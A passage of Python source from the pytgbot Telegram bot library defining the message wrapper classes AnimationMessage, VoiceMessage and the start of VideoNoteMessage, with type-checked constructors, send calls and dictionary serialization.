assert_type_or_raise(width, None, int, parameter_name="width")
self.width = width
assert_type_or_raise(height, None, int, parameter_name="height")
self.height = height
assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
self.thumb = thumb
assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
self.caption = caption
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
self.caption_entities = caption_entities
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_animation(
animation=self.animation,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
duration=self.duration,
width=self.width,
height=self.height,
thumb=self.thumb,
caption=self.caption,
parse_mode=self.parse_mode,
caption_entities=self.caption_entities,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this AnimationMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(AnimationMessage, self).to_array()
if isinstance(self.animation, InputFile):
array['animation'] = self.animation.to_array() # type InputFile
elif isinstance(self.animation, str):
array['animation'] = u(self.animation) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['duration'] = int(self.duration) # type int
array['width'] = int(self.width) # type int
array['height'] = int(self.height) # type int
if isinstance(self.thumb, InputFile):
array['thumb'] = self.thumb.to_array() # type InputFile
elif isinstance(self.thumb, str):
array['thumb'] = u(self.thumb) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
array['caption'] = u(self.caption) # py2: type unicode, py3: type str
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities) # type list of MessageEntity
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the AnimationMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(AnimationMessage, AnimationMessage).validate_array(array)
if isinstance(array.get('animation'), InputFile):
data['animation'] = InputFile.from_array(array.get('animation'))
elif isinstance(array.get('animation'), str):
data['animation'] = u(array.get('animation'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
data['width'] = int(array.get('width')) if array.get('width') is not None else None
data['height'] = int(array.get('height')) if array.get('height') is not None else None
if array.get('thumb') is None:
data['thumb'] = None
elif isinstance(array.get('thumb'), InputFile):
data['thumb'] = InputFile.from_array(array.get('thumb'))
elif isinstance(array.get('thumb'), str):
data['thumb'] = u(array.get('thumb'))
else:
raise TypeError('Unknown type, must be one of InputFile, str or None.')
# end if
data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new AnimationMessage from a given dictionary.
:return: new AnimationMessage instance.
:rtype: AnimationMessage
"""
if not array: # None or {}
return None
# end if
data = AnimationMessage.validate_array(array)
return AnimationMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(animationmessage_instance)`
"""
return "AnimationMessage(animation={self.animation!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, width={self.width!r}, height={self.height!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(animationmessage_instance)`
"""
return "AnimationMessage(animation={self.animation!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, width={self.width!r}, height={self.height!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in animationmessage_instance`
"""
return (
key in ["animation", "receiver", "reply_id", "duration", "width", "height", "thumb", "caption", "parse_mode", "caption_entities", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class AnimationMessage
class VoiceMessage(ReturnableMessageBase):
"""
Use this method to send audio files, if you want Telegram clients to display the file as a playable voice message. For this to work, your audio must be in an .OGG file encoded with OPUS (other formats may be sent as Audio or Document). On success, the sent Message is returned. Bots can currently send voice messages of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendvoice
Parameters:
:param voice: Audio file to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type voice: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param caption: Voice message caption, 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the voice message caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param duration: Duration of the voice message in seconds
:type duration: int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, voice, receiver=None, reply_id=DEFAULT_MESSAGE_ID, caption=None, parse_mode=None, caption_entities=None, duration=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send audio files, if you want Telegram clients to display the file as a playable voice message. For this to work, your audio must be in an .OGG file encoded with OPUS (other formats may be sent as Audio or Document). On success, the sent Message is returned. Bots can currently send voice messages of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendvoice
Parameters:
:param voice: Audio file to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type voice: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param caption: Voice message caption, 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the voice message caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param duration: Duration of the voice message in seconds
:type duration: int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(VoiceMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(voice, InputFile, unicode_type, parameter_name="voice")
self.voice = voice
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
self.caption = caption
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
self.caption_entities = caption_entities
assert_type_or_raise(duration, None, int, parameter_name="duration")
self.duration = duration
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_voice(
voice=self.voice,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
caption=self.caption,
parse_mode=self.parse_mode,
caption_entities=self.caption_entities,
duration=self.duration,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this VoiceMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(VoiceMessage, self).to_array()
if isinstance(self.voice, InputFile):
array['voice'] = self.voice.to_array() # type InputFile
elif isinstance(self.voice, str):
array['voice'] = u(self.voice) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['caption'] = u(self.caption) # py2: type unicode, py3: type str
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities) # type list of MessageEntity
array['duration'] = int(self.duration) # type int
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the VoiceMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(VoiceMessage, VoiceMessage).validate_array(array)
if isinstance(array.get('voice'), InputFile):
data['voice'] = InputFile.from_array(array.get('voice'))
elif isinstance(array.get('voice'), str):
data['voice'] = u(array.get('voice'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new VoiceMessage from a given dictionary.
:return: new VoiceMessage instance.
:rtype: VoiceMessage
"""
if not array: # None or {}
return None
# end if
data = VoiceMessage.validate_array(array)
return VoiceMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(voicemessage_instance)`
"""
return "VoiceMessage(voice={self.voice!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, duration={self.duration!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(voicemessage_instance)`
"""
return "VoiceMessage(voice={self.voice!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, duration={self.duration!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in voicemessage_instance`
"""
return (
key in ["voice", "receiver", "reply_id", "caption", "parse_mode", "caption_entities", "duration", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class VoiceMessage
class VideoNoteMessage(ReturnableMessageBase):
"""
As of v.4.0, Telegram clients support rounded square mp4 videos of up to 1 minute long. Use this method to send video messages. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendvideonote
Parameters:
:param video_note: Video note to send. Pass a file_id as String to send a video note that exists on the Telegram servers (recommended) or upload a new video using multipart/form-data. More info on Sending Files ». Sending video notes by a URL is currently unsupported
:type video_note: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent video in seconds
:type duration: int
:param length: Video width and height, i.e. diameter of the video message
:type length: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, video_note, receiver=None, reply_id=DEFAULT_MESSAGE_ID, duration=None, length=None, thumb=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
As of v.4.0, Telegram clients support rounded square mp4 videos of up to 1 minute long. Use this method to send video messages. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendvideonote
Parameters:
:param video_note: Video note to send. Pass a file_id as String to send a video note that exists on the Telegram servers (recommended) or upload a new video using multipart/form-data. More info on Sending Files ». Sending video notes by a URL is currently unsupported
:type video_note: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent video in seconds
:type duration: int
:param length: Video width and height, i.e. diameter of the video message
:type length: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(VideoNoteMessage, self).__init__()
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(video_note, InputFile, unicode_type, parameter_name="video_note")
self.video_note = video_note
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(duration, None, int, parameter_name="duration")
self.duration = duration
assert_type_or_raise(length, None, int, parameter_name="length")
self.length = length
assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
self.thumb = thumb
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_video_note(
video_note=self.video_note,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
duration=self.duration,
length=self.length,
thumb=self.thumb,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this VideoNoteMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(VideoNoteMessage, self).to_array()
if isinstance(self.video_note, InputFile):
array['video_note'] = self.video_note.to_array() # type InputFile
elif isinstance(self.video_note, str):
array['video_note'] = u(self.video_note) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['duration'] = int(self.duration) # type int
array['length'] = int(self.length) # type int
if isinstance(self.thumb, InputFile):
array['thumb'] = self.thumb.to_array() # type InputFile
elif isinstance(self.thumb, str):
array['thumb'] = u(self.thumb) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the VideoNoteMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.files import InputFile
